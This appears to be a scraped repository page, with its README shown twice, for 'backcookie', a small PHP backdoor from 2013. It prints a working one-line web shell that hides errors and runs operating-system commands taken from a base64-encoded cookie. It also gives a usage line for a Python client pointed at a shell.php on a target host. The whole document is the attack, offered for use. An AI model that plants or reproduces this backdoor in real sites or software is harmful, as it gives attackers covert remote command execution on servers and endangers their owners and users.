Small backdoor using cookie.
==========
<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>Example: python backcookie.py -u http://target.com/shell.php -c name_cookie
Copyright, 2013 by José Pino
| Name | Name | Last commit date | ||
|---|---|---|---|---|
Small backdoor using cookie.
==========
<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>Example: python backcookie.py -u http://target.com/shell.php -c name_cookie
Copyright, 2013 by José Pino